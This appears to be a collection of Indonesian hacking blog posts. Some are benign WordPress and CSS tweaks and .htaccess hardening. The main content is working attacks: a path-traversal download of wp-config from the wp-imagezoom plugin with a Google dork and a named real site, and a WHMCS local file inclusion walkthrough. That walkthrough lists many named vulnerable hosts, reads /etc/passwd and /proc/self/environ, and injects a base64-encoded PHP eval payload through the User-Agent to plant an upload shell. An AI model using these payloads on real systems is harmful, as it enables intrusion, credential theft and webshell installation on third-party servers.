Kebetulan pengen buat trit ini dah lama, yaudah buat aja sekarang.. ga ada kerjaan juga sih, cuman maen Final Fantasy di PC .. wkwkwk site sendiri juga ga bisa di akses dah habis masa aktifnya beha hahaha.. site sendiri ane pake trik ini waktu itu lagi ngoprek portal di localhost, dan alhamdulillah ane lom liat site ane di cloning.. yang mau step by step aja :v
Langsung ajha :

1. Buat file htmlnya lalu includekan ke css, pasti dah tau cara manggil cssnya, lalu kasih nama sia.css
Contoh :  

<html>
<head>
    <link rel="stylesheet" href="sia.css" />
<title>test</title>
</head>
<body>
</body>
</html> 

2. sia.css isikan kaya begini :
Karna terlalu panjang, jadi saya buat disini : http://passwordhosting.com/z.txt
Link ga bisa di buka, bisa di komen disni biar di uplaod ulang

3. Jika sudah save, kemudian lihat di atas ada pepek.css , oke kita buat pepek.css, dan isikan script berikut :
Karna terlalu panjang, jadi saya buat disini : http://passwordhosting.com/zz.txt
Link ga bisa di buka, bisa di komen disni biar di uplaod ulang

4. Lihat di bagian tengah ada nama css monyet.css , nah kita bikin lagi css monyet.css, dan isikan script berikut :

body{background:#000;}

5. Dan lihat hasilnya, jika background hitam maka berhasil, jika background masih tetap putih berarti lom terpanggil atau ada yang salah.

Mungkin abang-abang tau maksudnya apa yg saya posting ini..
Mungkin cuman trik simple dari saya ini bisa membantu membingungkan si copaser wkwkwk.. bye lanjut lagi maen PS1.

Oke malam semua, tadi iseng ingin bermain di wordpress dah lama ga megang wordpress sekalian belajar lebih dalam lagi , wordpress kian hari kian banyak aja bugnya keknya sih kalo di liat beha haahaha..

Sekarang saya akan share bagaimana kita manipulasi wp-config atau bisa disebut juga dengan menyembunyikan wp-config, terdengar sangat payah kan buat kalian ?? :D
tapi saya disini hanyaa sekedar share saja lah lumayan buat di coba nih.. behahahaha

Langsung Tkp :

1. Buat Folder bernama misalkan homo .
2. Jika sudah copykan wp-config kalian ke folder homo kemudian rename menjadi gay.php
3. Kemudian buka dulu di address , saya disini mengetes di localhost, jadi :

http://localhost/wordpress/homo/gay.php

4. Kemudian liat disana muncul error , seperti ini :

Warning: require_once(C:\xampp\htdocs\wordpress\homo/wp-settings.php) [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

Fatal error: require_once() [function.require]: Failed opening required 'C:\xampp\htdocs\wordpress\homo/wp-settings.php' (include_path='.;\xampp\php\PEAR') in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

Lihat Kata ini : 

C:\xampp\htdocs\wordpress\homo\gay.php on line 90

Buka gay.php melalui notepad++ dan lihat di Line 90.
Kalian rubah require_once(ABSPATH . 'wp-settings.php'); menjadi require_once(ABSPATH . '../wp-settings.php');
 
5. Refresh, dan Lihat terdapat error lagi, layaknya :

Warning: require(C:\xampp\htdocs\wordpress\homo/wp-includes/load.php) [function.require]: failed to open stream: No such file or directory in C:\xampp\htdocs\wordpress\wp-settings.php on line 21

Fatal error: require() [function.require]: Failed opening required 'C:\xampp\htdocs\wordpress\homo/wp-includes/load.php' (include_path='.;\xampp\php\PEAR') in C:\xampp\htdocs\wordpress\wp-settings.php on line 21

Kalian Copy semua File wp-includes or Copy langsung saja dirnya ke dir homo.

6. Refresh kembali, dan ternyata blank. Semua dir homo kalian atur sendiri untuk mengamankan nya :D.
Belum selsai .. kalian manipulasi dulu wp-config yang ada di home kalian , layaknya seperti ini saya manipulasi :

 <?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'si_homo');

/** MySQL database username */
define('DB_USER', 'homo_kao');

/** MySQL database password */
define('DB_PASSWORD', 'gay_dasar_loe');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY',         'c3lVn iu`j#*x_nX9K1N*X)%#Mj;UPZ+@Ty/M/f8 3Y~c{Aa%Yl]uD]&/|H*..i4');
define('SECURE_AUTH_KEY',  'Y<dauHGa6X?Ln*+_^_Q9}2apqf=+q+L0$KuS0?x;~ RI,-sTqQh^_M8$wmo@#[S-');
define('LOGGED_IN_KEY',    'ccrz>RKwh:n%.X%R32y2rgPY|y)3.Md(J.}p!o}<>sLeJ9oREEG2HSXO]4z5:Ygg');
define('NONCE_KEY',        'g(V<~wN{Tr_A^@K)tr)wkh-Lu~4[lQmY>D<P|>=[H#X,1ll!$J~YBsl$Id[Rg&%]');
define('AUTH_SALT',        'yRYaDcOM5m)el$U,6(:/3@~j}%`bQ?fC mwZE1$XM3:PSXv+Tv@{Q;)A6c-DrHl ');
define('SECURE_AUTH_SALT', 'W.*K>:H.1&q<*dW5jNo+~K}+vQqpp&u_tuL!voXXl~gc[.T<Ff9JK;Dp-b4ng^&|');
define('LOGGED_IN_SALT',   '}@mJlO,SO~%T?.~R>!=t_u:T_^0lp4Qy, b_}(D:os>v2uEyhRPxL-D?&TQk21]+');
define('NONCE_SALT',       ';99){buN>>{lslBg-1Pm&r&g?N/O_;R7C0u_EXBtuxYfzBFs38YPSG#S>VU,SL5E');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix  = 'drom_';

/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
* language support.
*/
define('WPLANG', '');

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Kemudian Save.

7. Refresh, dan lihat , jika terjadi error seperti ini :
Error establishing a database connection
hmm,, belum terkoneksi. tenang kalian buka File wp-load.php di notepad ++, kemudian lihat :

- Line 26 : ada wp-config.php rubah menjadi homo/gay.php
- Line 29 : ada wp-config.php rubah menjadi homo/gay.php
- Line 31 : ada wp-config.php rubah menjadi homo/gay.php
- Line 34 : ada wp-config.php rubah menjadi homo/gay.php

Kemudian Save , dan lihat hasilnya.
Wew masih error, layaknya :

Warning: require_once(C:\xampp\htdocs\wordpress/../wp-settings.php) [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

Fatal error: require_once() [function.require]: Failed opening required 'C:\xampp\htdocs\wordpress/../wp-settings.php' (include_path='.;\xampp\php\PEAR') in C:\xampp\htdocs\wordpress\homo\gay.php on line 90

Kalian buka file gay.php kemudian ke Line 90 , rubah require_once(ABSPATH . '../wp-settings.php'); menjadi require_once(ABSPATH . './wp-settings.php');

Kemudian Save, dan Lihat hasilnya.
dan ternyata berhasil normal kembali, dan jika ada yang symlink .. hmmm pasti dia homo .. beha hahahaha :D

Mungkin tutorial ini berguna jika semua normal, saya tadi di cek di localhost normal, dan belum mencoba di site sendiri, jika saya repost atau mungkin sudah ada Tutorialnya, maklumi saya hanya mencobanya.. beha hahahaha :D

Lagi main reduniverse.com , bosan ga ada siapa-siapa.. anak-anak pada sibuk sendiri, yaudah we postingin ini, lumayan juga nih buat di coba, :D . Emang ga terlalu banyak nih targetnya kalau kata saya , tadi dah ngedork di google. Oke coba aja deh..

Dork :

inurl:/wp-content/plugins/wp-imagezoom/

Exploit :

wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php

Example : 

http://estanciarural.com/anuncio/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php

Download, dan lihat Confignya. :D

Gimana donk konekin nya :
Sebenernya tergantung port yang kebuka sih menurut informasi sekitar, bisa menggunakan beberapa cara ini :

- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).

Kemaren iseng-iseng jalan di google ngedork balitbang, eh masih ada aja uang make default user : admin pass : admin , wkwkwk kemana ya admin webnya :v, mending wa yang urus, lumayan di bayar :v.
Ini Sebenernya ada 2 cara pencegahan yang saya ketahui , mungkin bisa dimana saja mengupload shell dengan berbagai cara, saya hanya menyeutkan 2 saja, karena masih belum di ubrak abrik lagi ngehahahaha. Lumayan buat nambah security walaupun cuman dikit-dikit.. job yang waktu itu juga belum kelar malah di terusin awal bulan juli, lumayan kan memanfaatkan waktu buat explore lagi balitbangnya :D .
Ayo langsung aja ke cara pertama. Cara yang pertama simple sih cuman pake .htaccess


- Pencegahan di modul silabus.
1. Pergi ke direktori silabus ex : localhost/webtemp/silabus/
2. Kemudian kamu buat file .htaccess.
3. Kalau udah masukan script ini :

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Lah kita simple aja sih masukin script kek gitu, masa silabus di jadikan tempat pengeksekusian script .. wkwkwkw silabus kan .doc , .pdf , dll
4. Pergi ke halaman admin, ke menu silabus, upload php, jalanin deh, liat tuh malah Forbidden , trus upload lagi document, liat tuh malah download, berarti berhasil :D .

-Pencegahan di Posisi menu modul
1. Pergi ke direktori functions ex : localhost/webtemp/functions/
2. Kemudian kamu harus merubah permission 2 file :

editfile.php
simmenu.php

3. Rubah kedua permission tersebut jadi 0000 , wkwkwkwk biarinlah biar aman :D
4. Test, kamu masuk halaman admin balitbang , ke menu Setting Admin, trus ke menu Posisi menu modul
5. Klik salah satu File misalnya tag_soal.php , kemudian Edit Script Fungsi / Browse , dan Lihat .. Access Denied. Lihat juga ke bawah ada tulisan | Tambah Posisi Menu | .. wew coba tambahkan, dan liat malah Access Denied . wkwkwkw

Jika ada yang bertanya? gimana donk kalau si admin mau nambahin tag_modul baru kaya.. iklan , shoutbox , dll. Nah rubah dulu aja lagi permission nya jadi 0755 ., kalau udah di tambahkan tag baru, rubah lagi jadi 0000.

Sama seperti sebelumnya, masih membahas WHMCS..
Ada yang tau apa itu LFI ??
kalo yg belum saya akan menjelaskan sedikit apa itu LFI .
LFI a.k.a Local File Inclusion adalah sebuah bug dimana kita bisa mengexploitnya hanya dengan melalui URL, dan memanfaatkan segala cara untuk bisa mengakses Web tersebut.
Oke langsung saja ke POCnya :

1. Biasalah cari target dengan dork, dorknya sama kaya yang submitticket hanya rubah ja nanti dengan exploitnya.

2. Misalnya saya punya target yang sudah Vuln :

http://www.hosting.joomi.co.il/cart.php
http://www.hosty.nl/cart.php
http://mijn.h5hosting.nl/cart.php
http://www.tele-asia.net/billing/cart.php
http://test.idcbest.hk/cart.php
http://client.mousenet.net/cart.php
http://hostxweb.com/client/cart.php
http://customer.leohost.net/cart.php
http://area-clienti.cambali.it/cart.php
http://billing.edom.hu/cart.php
http://xtremehost.herobo.com/cart.php
http://www.nethosting.freeiz.com/clientes/cart.php

Di atas kita hanya memanfaatkan memalui cart.php atau bisa juga dengan yg lain nya , yg memiliki kerentanan.

3. Kemudian masukkan exploit LFI :

cart.php?a=syndrom&templatefile=../../../configuration.php

Sehingga misalnya kita contohkan seperti ini, :

http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../configuration.php

4. Liat Source Web tersebut dengan menekan Ctrl+u , scroll kebawah dan lihat disana ada configuration webnya :D. asikk
Bagaimana cara mengkonekan nya :/

5.Ada beberapa cara untuk mengkonekan Configuration tersebut :

- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).

Anda tidak bisa mengkonekan sembarangan dengan port default, tentunya kita harus mengetahui port yang terbuka terlebih dahulu, untuk bisa mengakses semua Filenya, ada beberapa cara juga untuk mengecek portnya, diantaranya bisa menggunakan nmap bisa juga memakai port scanner yg ada di shell :D.

Ada Cara kedua selain mengkonekan dengan cara tersebut.
Caranya dengan menggunakan tamper data.

1. Install Dulu addons tamper data yg ada di mozilla
2. Setelah di install , kita cek /etc/passwdnya :

http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../../../../../../../../../../../../../../etc/passwd

Kalo muncul , otomatis /proc/self/environ nya pun muncul, kita lihat muncul tidak :

http://www.nethosting.freeiz.com/clientes/cart.php?a=syndrom&templatefile=../../../../../../../proc/self/environ

3. Kemudian buka tamper lalu refresh , Klik tamper.. jangan Submit ataupun Cancel pastinya ;)
Disitu ada kolom User Agent, hapus tulisan yang Mozilla blablabla lalu ganti dengan :

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiZG93bmxvYWRzL2luZGV4eC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})

Lalu ok, setelah proses tamper selsai, lalu kita cek apakah muncul tempat upload ??

http://www.nethosting.freeiz.com/clientes/downloads/indexx.php

/downloads/indexx.php << adalah path yang ada di exploit tersebut. ;)